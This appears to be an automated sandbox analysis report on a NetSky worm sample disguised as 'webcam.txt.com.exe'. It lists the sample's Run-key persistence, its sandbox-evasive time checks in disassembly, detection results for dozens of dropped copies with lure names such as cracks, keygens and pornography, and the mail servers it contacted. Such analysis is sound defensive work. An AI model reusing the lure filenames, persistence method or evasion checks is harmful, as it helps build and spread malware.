Source: C:\Users\user\Desktop\webcam.txt.com.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run ICQ NetJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: icon1548.png

Malware Analysis System Evasion

barindex
Source: C:\Windows\winlogon.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_1-2406
Source: C:\Users\user\Desktop\webcam.txt.com.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_0-2655
Source: C:\Windows\winlogon.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_1-2722
Source: C:\Windows\winlogon.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_1-2629
Source: C:\Users\user\Desktop\webcam.txt.com.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_0-2590
Source: C:\Windows\winlogon.exeAPI coverage: 9.2 %
Source: C:\Users\user\Desktop\webcam.txt.com.exe TID: 6320Thread sleep count: 141 > 30Jump to behavior
Source: C:\Users\user\Desktop\webcam.txt.com.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\webcam.txt.com.exeCode function: 0_2_00403085 GetLocalTime followed by cmp: cmp word ptr [ebp-0ah], 001ah and CTI: jne 004030EFh0_2_00403085
Source: C:\Users\user\Desktop\webcam.txt.com.exeCode function: 0_2_00403085 GetLocalTime followed by cmp: cmp word ptr [ebp-0eh], 0002h and CTI: jne 004030EFh0_2_00403085
Source: C:\Users\user\Desktop\webcam.txt.com.exeCode function: 0_2_00403085 GetLocalTime followed by cmp: cmp word ptr [ebp-10h], 07d4h and CTI: jne 004030EFh0_2_00403085
Source: C:\Users\user\Desktop\webcam.txt.com.exeCode function: 0_2_00403085 GetLocalTime followed by cmp: cmp word ptr [ebp-08h], 0006h and CTI: je 004030CFh0_2_00403085
Source: C:\Users\user\Desktop\webcam.txt.com.exeCode function: 0_2_00403085 GetLocalTime followed by cmp: cmp word ptr [ebp-08h], 0007h and CTI: je 004030CFh0_2_00403085
Source: C:\Users\user\Desktop\webcam.txt.com.exeCode function: 0_2_00403085 GetLocalTime followed by cmp: cmp word ptr [ebp-08h], 0008h and CTI: jne 004030EFh0_2_00403085
Source: C:\Users\user\Desktop\webcam.txt.com.exeCode function: 0_2_004019E8 GetSystemTime followed by cmp: cmp word ptr [ebp-10h], 07dah and CTI: jbe 00401A0Eh0_2_004019E8
Source: C:\Users\user\Desktop\webcam.txt.com.exeCode function: 0_2_004019E8 GetSystemTime followed by cmp: cmp word ptr [ebp-0eh], 0001h and CTI: jc 00401A1Ch0_2_004019E8
Source: C:\Users\user\Desktop\webcam.txt.com.exeCode function: 0_2_004019E8 GetSystemTime followed by cmp: cmp word ptr [ebp-0eh], 000ch and CTI: jbe 00401A22h0_2_004019E8
Source: C:\Users\user\Desktop\webcam.txt.com.exeCode function: 0_2_004019E8 GetSystemTime followed by cmp: cmp word ptr [ebp-0ah], 0001h and CTI: jc 00401A30h0_2_004019E8
Source: C:\Users\user\Desktop\webcam.txt.com.exeCode function: 0_2_004019E8 GetSystemTime followed by cmp: cmp word ptr [ebp-0ah], 001fh and CTI: jbe 00401A36h0_2_004019E8
Source: C:\Windows\winlogon.exeCode function: 1_2_004019E8 GetSystemTime followed by cmp: cmp word ptr [ebp-10h], 07dah and CTI: jbe 00401A0Eh1_2_004019E8
Source: C:\Windows\winlogon.exeCode function: 1_2_004019E8 GetSystemTime followed by cmp: cmp word ptr [ebp-0eh], 0001h and CTI: jc 00401A1Ch1_2_004019E8
Source: C:\Windows\winlogon.exeCode function: 1_2_004019E8 GetSystemTime followed by cmp: cmp word ptr [ebp-0eh], 000ch and CTI: jbe 00401A22h1_2_004019E8
Source: C:\Windows\winlogon.exeCode function: 1_2_004019E8 GetSystemTime followed by cmp: cmp word ptr [ebp-0ah], 0001h and CTI: jc 00401A30h1_2_004019E8
Source: C:\Windows\winlogon.exeCode function: 1_2_004019E8 GetSystemTime followed by cmp: cmp word ptr [ebp-0ah], 001fh and CTI: jbe 00401A36h1_2_004019E8
Source: C:\Windows\winlogon.exeCode function: 1_2_00403085 GetLocalTime followed by cmp: cmp word ptr [ebp-0ah], 001ah and CTI: jne 004030EFh1_2_00403085
Source: C:\Windows\winlogon.exeCode function: 1_2_00403085 GetLocalTime followed by cmp: cmp word ptr [ebp-0eh], 0002h and CTI: jne 004030EFh1_2_00403085
Source: C:\Windows\winlogon.exeCode function: 1_2_00403085 GetLocalTime followed by cmp: cmp word ptr [ebp-10h], 07d4h and CTI: jne 004030EFh1_2_00403085
Source: C:\Windows\winlogon.exeCode function: 1_2_00403085 GetLocalTime followed by cmp: cmp word ptr [ebp-08h], 0006h and CTI: je 004030CFh1_2_00403085
Source: C:\Windows\winlogon.exeCode function: 1_2_00403085 GetLocalTime followed by cmp: cmp word ptr [ebp-08h], 0007h and CTI: je 004030CFh1_2_00403085
Source: C:\Windows\winlogon.exeCode function: 1_2_00403085 GetLocalTime followed by cmp: cmp word ptr [ebp-08h], 0008h and CTI: jne 004030EFh1_2_00403085
Source: C:\Users\user\Desktop\webcam.txt.com.exeCode function: 0_2_00402CEA FindFirstFileA,CharLowerBuffA,FindNextFileA,FindClose,0_2_00402CEA
Source: C:\Windows\winlogon.exeCode function: 1_2_00402CEA FindFirstFileA,FindNextFileA,1_2_00402CEA
Source: webcam.txt.com.exe, 00000000.00000003.2024854757.000000000052F000.00000004.00000020.00020000.00000000.sdmp, webcam.txt.com.exe, 00000000.00000003.2024747006.0000000000522000.00000004.00000020.00020000.00000000.sdmp, webcam.txt.com.exe, 00000000.00000003.2024802701.0000000000529000.00000004.00000020.00020000.00000000.sdmp, webcam.txt.com.exe, 00000000.00000003.2024689790.0000000000519000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2Qjnc,nj\/6hu_lneafi_nfledvm367ebfakq.js?bu=dx0ma3d6fxrucbibtqempqemuae&or=w'});;
Source: webcam.txt.com.exe, 00000000.00000002.4112381428.000000000049E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\webcam.txt.com.exeCode function: 0_2_004057EB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_004057EB
Source: C:\Users\user\Desktop\webcam.txt.com.exeCode function: 0_2_00401B67 GetLocalTime,GetTimeZoneInformation,wsprintfA,0_2_00401B67
Source: C:\Users\user\Desktop\webcam.txt.com.exeCode function: 0_2_00401B67 GetLocalTime,GetTimeZoneInformation,wsprintfA,0_2_00401B67
Source: C:\Users\user\Desktop\webcam.txt.com.exeCode function: 0_2_00403B04 GetVersion,GetCommandLineA,GetModuleHandleA,0_2_00403B04
Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpactResource DevelopmentReconnaissance
Valid Accounts12
Native API
1
Registry Run Keys / Startup Folder
1
Process Injection
42
Masquerading
OS Credential Dumping12
System Time Discovery
Remote Services1
Archive Collected Data
Exfiltration Over Other Network Medium1
Encrypted Channel
Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationAbuse Accessibility FeaturesAcquire InfrastructureGather Victim Identity Information
Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
Registry Run Keys / Startup Folder
1
Virtualization/Sandbox Evasion
LSASS Memory11
Security Software Discovery
Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
Ingress Tool Transfer
SIM Card SwapObtain Device Cloud BackupsNetwork Denial of ServiceDomainsCredentials
Domain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Process Injection
Security Account Manager1
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
Non-Application Layer Protocol
Data Encrypted for ImpactDNS ServerEmail Addresses
Local AccountsCronLogin HookLogin Hook2
Obfuscated Files or Information
NTDS1
File and Directory Discovery
Distributed Component Object ModelInput CaptureTraffic Duplication11
Application Layer Protocol
Data DestructionVirtual Private ServerEmployee Names
Cloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
Software Packing
LSA Secrets3
System Information Discovery
SSHKeyloggingScheduled TransferFallback ChannelsData Encrypted for ImpactServerGather Victim Network Information
Replication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
File Deletion
Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureData Transfer Size LimitsMultiband CommunicationService StopBotnetDomain Properties

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
webcam.txt.com.exe95%ReversingLabsWin32.Worm.NetSky
webcam.txt.com.exe93%VirustotalBrowse
webcam.txt.com.exe100%AviraWORM/Netsky.C
webcam.txt.com.exe100%Joe Sandbox ML
SourceDetectionScannerLabelLink
C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\Ulead Keygen.exe100%AviraWORM/Netsky.C
C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\Cracks & Warez Archive.exe100%AviraWORM/Netsky.C
C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\Opera.exe100%AviraWORM/Netsky.C
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Adobe Photoshop 9 full.exe100%AviraWORM/Netsky.C
C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\Visual Studio Net Crack.exe100%AviraWORM/Netsky.C
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\1000 Sex and more.rtf.exe100%AviraWORM/Netsky.C
C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\The Sims 3 crack.exe100%AviraWORM/Netsky.C
C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\DivX 7.0 final.exe100%AviraWORM/Netsky.C
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Adobe Premiere 9.exe100%AviraWORM/Netsky.C
C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\IE58.1 full setup.exe100%AviraWORM/Netsky.C
C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\Smashing the stack.rtf.exe100%AviraWORM/Netsky.C
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\ACDSee 9.exe100%AviraWORM/Netsky.C
C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\Lightwave SE Update.exe100%AviraWORM/Netsky.C
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\3D Studio Max 3dsmax.exe100%AviraWORM/Netsky.C
C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\WinAmp 12 full.exe100%AviraWORM/Netsky.C
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Ahead Nero 7.exe100%AviraWORM/Netsky.C
C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\Ulead Keygen.exe100%Joe Sandbox ML
C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\Cracks & Warez Archive.exe100%Joe Sandbox ML
C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\Opera.exe100%Joe Sandbox ML
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Adobe Photoshop 9 full.exe100%Joe Sandbox ML
C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\Visual Studio Net Crack.exe100%Joe Sandbox ML
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\1000 Sex and more.rtf.exe100%Joe Sandbox ML
C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\The Sims 3 crack.exe100%Joe Sandbox ML
C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\DivX 7.0 final.exe100%Joe Sandbox ML
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Adobe Premiere 9.exe100%Joe Sandbox ML
C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\IE58.1 full setup.exe100%Joe Sandbox ML
C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\Smashing the stack.rtf.exe100%Joe Sandbox ML
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\ACDSee 9.exe100%Joe Sandbox ML
C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\Lightwave SE Update.exe100%Joe Sandbox ML
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\3D Studio Max 3dsmax.exe100%Joe Sandbox ML
C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\WinAmp 12 full.exe100%Joe Sandbox ML
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Ahead Nero 7.exe100%Joe Sandbox ML
C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\Cracks & Warez Archive.exe95%ReversingLabsWin32.Worm.NetSky
C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\DivX 7.0 final.exe95%ReversingLabsWin32.Worm.NetSky
C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\IE58.1 full setup.exe95%ReversingLabsWin32.Worm.NetSky
C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\Lightwave SE Update.exe95%ReversingLabsWin32.Worm.NetSky
C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\Opera.exe95%ReversingLabsWin32.Worm.NetSky
C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\Smashing the stack.rtf.exe95%ReversingLabsWin32.Worm.NetSky
C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\The Sims 3 crack.exe95%ReversingLabsWin32.Worm.NetSky
C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\Ulead Keygen.exe95%ReversingLabsWin32.Worm.NetSky
C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\Visual Studio Net Crack.exe95%ReversingLabsWin32.Worm.NetSky
C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\WinAmp 12 full.exe95%ReversingLabsWin32.Worm.NetSky
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\1000 Sex and more.rtf.exe95%ReversingLabsWin32.Worm.NetSky
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\3D Studio Max 3dsmax.exe95%ReversingLabsWin32.Worm.NetSky
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\ACDSee 9.exe95%ReversingLabsWin32.Worm.NetSky
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Adobe Photoshop 9 full.exe95%ReversingLabsWin32.Worm.NetSky
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Adobe Premiere 9.exe95%ReversingLabsWin32.Worm.NetSky
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Ahead Nero 7.exe95%ReversingLabsWin32.Worm.NetSky
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Best Matrix Screensaver.scr95%ReversingLabsWin32.Worm.NetSky
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Clone DVD 5.exe95%ReversingLabsWin32.Worm.NetSky
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Cracks & Warez Archive.exe95%ReversingLabsWin32.Worm.NetSky
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Dark Angels.pif95%ReversingLabsWin32.Worm.NetSky
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Dictionary English - France.doc.exe95%ReversingLabsWin32.Worm.NetSky
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\DivX 7.0 final.exe95%ReversingLabsWin32.Worm.NetSky
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Doom 3 Beta.exe95%ReversingLabsWin32.Worm.NetSky
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\E-Book Archive.rtf.exe95%ReversingLabsWin32.Worm.NetSky
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Full album.mp3.pif95%ReversingLabsWin32.Worm.NetSky
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Gimp 1.5 Full with Key.exe95%ReversingLabsWin32.Worm.NetSky
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\How to hack.doc.exe95%ReversingLabsWin32.Worm.NetSky
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\IE58.1 full setup.exe95%ReversingLabsWin32.Worm.NetSky
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Keygen 4 all appz.exe95%ReversingLabsWin32.Worm.NetSky
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Learn Programming.doc.exe95%ReversingLabsWin32.Worm.NetSky
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Lightwave SE Update.exe95%ReversingLabsWin32.Worm.NetSky
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\MS Service Pack 5.exe95%ReversingLabsWin32.Worm.NetSky
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Magix Video Deluxe 4.exe95%ReversingLabsWin32.Worm.NetSky
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Microsoft Office 2003 Crack.exe95%ReversingLabsWin32.Worm.NetSky
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Microsoft WinXP Crack.exe95%ReversingLabsWin32.Worm.NetSky
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Norton Antivirus 2004.exe95%ReversingLabsWin32.Worm.NetSky
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Office Setup Controller\Adobe Photoshop 9 full.exe95%ReversingLabsWin32.Worm.NetSky
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Office Setup Controller\Adobe Premiere 9.exe95%ReversingLabsWin32.Worm.NetSky
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Office Setup Controller\Best Matrix Screensaver.scr95%ReversingLabsWin32.Worm.NetSky
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Office Setup Controller\Microsoft WinXP Crack.exe95%ReversingLabsWin32.Worm.NetSky
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Office Setup Controller\Porno Screensaver.scr95%ReversingLabsWin32.Worm.NetSky
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Office Setup Controller\Teen Porn 16.jpg.pif95%ReversingLabsWin32.Worm.NetSky
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Opera.exe95%ReversingLabsWin32.Worm.NetSky
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Partitionsmagic 9.0.exe95%ReversingLabsWin32.Worm.NetSky
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Porno Screensaver.scr95%ReversingLabsWin32.Worm.NetSky
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\RFC Basics Full Edition.doc.exe95%ReversingLabsWin32.Worm.NetSky
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Screensaver.scr95%ReversingLabsWin32.Worm.NetSky
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Serials.txt.exe95%ReversingLabsWin32.Worm.NetSky
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Smashing the stack.rtf.exe95%ReversingLabsWin32.Worm.NetSky
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Star Office 8.exe95%ReversingLabsWin32.Worm.NetSky
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Teen Porn 16.jpg.pif95%ReversingLabsWin32.Worm.NetSky
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\The Sims 3 crack.exe95%ReversingLabsWin32.Worm.NetSky
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Ulead Keygen.exe95%ReversingLabsWin32.Worm.NetSky
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Virii Sourcecode.scr95%ReversingLabsWin32.Worm.NetSky
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Visual Studio Net Crack.exe95%ReversingLabsWin32.Worm.NetSky
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Win Longhorn Beta.exe95%ReversingLabsWin32.Worm.NetSky
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\WinAmp 12 full.exe95%ReversingLabsWin32.Worm.NetSky
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\WinXP eBook.doc.exe95%ReversingLabsWin32.Worm.NetSky
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Windows Sourcecode.doc.exe95%ReversingLabsWin32.Worm.NetSky
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\XXX hardcore pic.jpg.exe95%ReversingLabsWin32.Worm.NetSky
C:\Program Files (x86)\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\Ahead Nero 7.exe95%ReversingLabsWin32.Worm.NetSky
C:\Program Files (x86)\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\Doom 3 Beta.exe95%ReversingLabsWin32.Worm.NetSky
C:\Program Files (x86)\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\E-Book Archive.rtf.exe95%ReversingLabsWin32.Worm.NetSky
C:\Program Files (x86)\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\How to hack.doc.exe95%ReversingLabsWin32.Worm.NetSky
C:\Program Files (x86)\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\Virii Sourcecode.scr95%ReversingLabsWin32.Worm.NetSky
C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\AddInViews\IE58.1 full setup.exe95%ReversingLabsWin32.Worm.NetSky
C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\AddInViews\Lightwave SE Update.exe95%ReversingLabsWin32.Worm.NetSky
C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\AddInViews\Smashing the stack.rtf.exe95%ReversingLabsWin32.Worm.NetSky
No Antivirus matches
SourceDetectionScannerLabelLink
mta6.am0.yahoodns.net0%VirustotalBrowse
mail.reg.ca0%VirustotalBrowse
onlineconnections.com.au1%VirustotalBrowse
mx01.earthlink-vadesecure.net0%VirustotalBrowse
gzip.org0%VirustotalBrowse
mx.cam.ac.uk0%VirustotalBrowse
cl.cam.ac.uk0%VirustotalBrowse
kinoho.net0%VirustotalBrowse
vision-media.ca0%VirustotalBrowse
luiscouto.pt0%VirustotalBrowse
src.dec.com0%VirustotalBrowse
sitnik.ru0%VirustotalBrowse
thejameskyle.com0%VirustotalBrowse
cryptsoft.com0%VirustotalBrowse
cloudhead.net0%VirustotalBrowse
theriver.com1%VirustotalBrowse
netcom.com0%VirustotalBrowse
SourceDetectionScannerLabelLink
https://videoadssdk.azurewebsites.net/api/vpaid?code=ormoexb1ssje12klg/9jqrbzzm42xq/dp1abfowaq7tvzd40%Avira URL Cloudsafe
https://raw.githubusercontent.com/jakearchibald/es6-promise/master/license0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
mta6.am0.yahoodns.net
67.195.204.73
truetrueunknown
pb-mx22.pobox.com
173.228.157.41
truefalse
    high
    onlineconnections.com.au
    192.254.190.168
    truefalseunknown
    ismtp.sitestar.everyone.net
    64.29.151.236
    truefalse
      high
      mail.reg.ca
      66.196.36.12
      truefalseunknown
      outlook-com.olc.protection.outlook.com
      52.101.73.10
      truefalse
        high
        mx01.earthlink-vadesecure.net
        51.81.61.70
        truefalseunknown
        mx01.mail.icloud.com
        17.57.154.33
        truefalse
          high
          gzip.org
          85.187.148.2
          truetrueunknown
          gmail-smtp-in.l.google.com
          172.253.115.27
          truefalse
            high
            alumni-caltech-edu.mail.protection.outlook.com
            104.47.66.10
            truefalse
              high
              eforward1.registrar-servers.com
              162.255.118.51
              truefalse
                high
                mxa-00377f01.gslb.pphosted.com
                185.183.28.235
                truefalse
                  high
                  eggs.gnu.org
                  209.51.188.92
                  truefalse
                    high
                    mx.cam.ac.uk
                    131.111.8.146
                    truefalseunknown
                    aspmx.l.google.com
                    142.251.167.26
                    truefalse
                      high
                      alumni.caltech.edu
                      unknown
                      unknownfalse
                        high
                        8.8.29
                        unknown
                        unknowntrue
                          unknown
                          8.110.4
                          unknown
                          unknowntrue
                            unknown
                            cl.cam.ac.uk
                            unknown
                            unknowntrueunknown
                            vision-media.ca
                            unknown
                            unknowntrueunknown
                            4x.png
                            unknown
                            unknowntrue
                              unknown
                              1.10.295
                              unknown
                              unknowntrue
                                unknown
                                kinoho.net
                                unknown
                                unknowntrueunknown
                                3.3.2
                                unknown
                                unknowntrue
                                  unknown
                                  luiscouto.pt
                                  unknown
                                  unknowntrueunknown
                                  8.13.17
                                  unknown
                                  unknowntrue
                                    unknown
                                    yahoo.com
                                    unknown
                                    unknownfalse
                                      high
                                      0.11.10
                                      unknown
                                      unknowntrue
                                        unknown
                                        8.2.42
                                        unknown
                                        unknowntrue
                                          unknown
                                          src.dec.com
                                          unknown
                                          unknowntrueunknown
                                          7.22.5
                                          unknown
                                          unknowntrue
                                            unknown
                                            sitnik.ru
                                            unknown
                                            unknowntrueunknown
                                            2.6.33
                                            unknown
                                            unknowntrue
                                              unknown
                                              thejameskyle.com
                                              unknown
                                              unknowntrueunknown
                                              2.5.3
                                              unknown
                                              unknowntrue
                                                unknown
                                                2.0.12
                                                unknown
                                                unknowntrue
                                                  unknown
                                                  nongnu.org
                                                  unknown
                                                  unknownfalse
                                                    high
                                                    pobox.com
                                                    unknown
                                                    unknownfalse
                                                      high
                                                      cryptsoft.com
                                                      unknown
                                                      unknowntrueunknown
                                                      3.1.74
                                                      unknown
                                                      unknowntrue
                                                        unknown
                                                        1.1.49-custom.16
                                                        unknown
                                                        unknowntrue
                                                          unknown
                                                          8.5.22
                                                          unknown
                                                          unknowntrue
                                                            unknown
                                                            8.5.12
                                                            unknown
                                                            unknowntrue
                                                              unknown
                                                              2x.png
                                                              unknown
                                                              unknowntrue
                                                                unknown
                                                                cloudhead.net
                                                                unknown
                                                                unknowntrueunknown
                                                                8.6.28
                                                                unknown
                                                                unknowntrue
                                                                  unknown
                                                                  theriver.com
                                                                  unknown
                                                                  unknowntrueunknown
                                                                  netcom.com
                                                                  unknown
                                                                  unknowntrueunknown
                                                                  4.2.1
                                                                  unknown
                                                                  unknowntrue
                                                                    unknown
                                                                    0.23.0
                                                                    unknown
                                                                    unknowntrue
                                                                      unknown
                                                                      4.0.0
                                                                      unknown
                                                                      unknowntrue
                                                                        unknown
                                                                        openoffice.org
                                                                        unknown
                                                                        unknownfalse
                                                                          high
                                                                          3x.png
                                                                          unknown
                                                                          unknowntrue
                                                                            unknown
                                                                            3.4.2
                                                                            unknown
                                                                            unknowntrue
                                                                              unknown
                                                                              7.2.9
                                                                              unknown
                                                                              unknowntrue
                                                                                unknown
                                                                                8.9.15
                                                                                unknown
                                                                                unknowntrue
                                                                                  unknown
                                                                                  18.2.0
                                                                                  unknown
                                                                                  unknowntrue
                                                                                    unknown
                                                                                    2.2.11
                                                                                    unknown
                                                                                    unknowntrue
                                                                                      unknown
                                                                                      tootallnate.net
                                                                                      unknown
                                                                                      unknowntrue
                                                                                        unknown
                                                                                        2.4.2
                                                                                        unknown
                                                                                        unknowntrue
                                                                                          unknown
                                                                                          gmail.com
                                                                                          unknown
                                                                                          unknownfalse
                                                                                            high
                                                                                            2.2.15
                                                                                            unknown
                                                                                            unknowntrue
                                                                                              unknown
                                                                                              2.2.0
                                                                                              unknown
                                                                                              unknowntrue
                                                                                                unknown
                                                                                                15.7.2
                                                                                                unknown
                                                                                                unknowntrue
                                                                                                  unknown
                                                                                                  blakeembrey.com
                                                                                                  unknown
                                                                                                  unknowntrue
                                                                                                    unknown
                                                                                                    1.0.5
                                                                                                    unknown
                                                                                                    unknowntrue
                                                                                                      unknown
                                                                                                      outlook.com
                                                                                                      unknown
                                                                                                      unknownfalse
                                                                                                        high
                                                                                                        bryson.demon.co.uk
                                                                                                        unknown
                                                                                                        unknowntrue
                                                                                                          unknown
                                                                                                          mx2-lw-eu.apache.org
                                                                                                          unknown
                                                                                                          unknownfalse
                                                                                                            high
                                                                                                            9.0.6
                                                                                                            unknown
                                                                                                            unknowntrue
                                                                                                              unknown
                                                                                                              8.2.11
                                                                                                              unknown
                                                                                                              unknowntrue
                                                                                                                unknown
                                                                                                                northcoast.com
                                                                                                                unknown
                                                                                                                unknowntrue
                                                                                                                  unknown
                                                                                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                  https://spdx.org/licenses/mit.html)webcam.txt.com.exe, 00000000.00000002.4114021770.0000000002F20000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://videoadssdk.azurewebsites.net/api/vpaid?code=ormoexb1ssje12klg/9jqrbzzm42xq/dp1abfowaq7tvzd4webcam.txt.com.exe, 00000000.00000003.3133044573.0000000000545000.00000004.00000020.00020000.00000000.sdmp, webcam.txt.com.exe, 00000000.00000003.3136511757.0000000000545000.00000004.00000020.00020000.00000000.sdmp, webcam.txt.com.exe, 00000000.00000002.4112709818.0000000000545000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
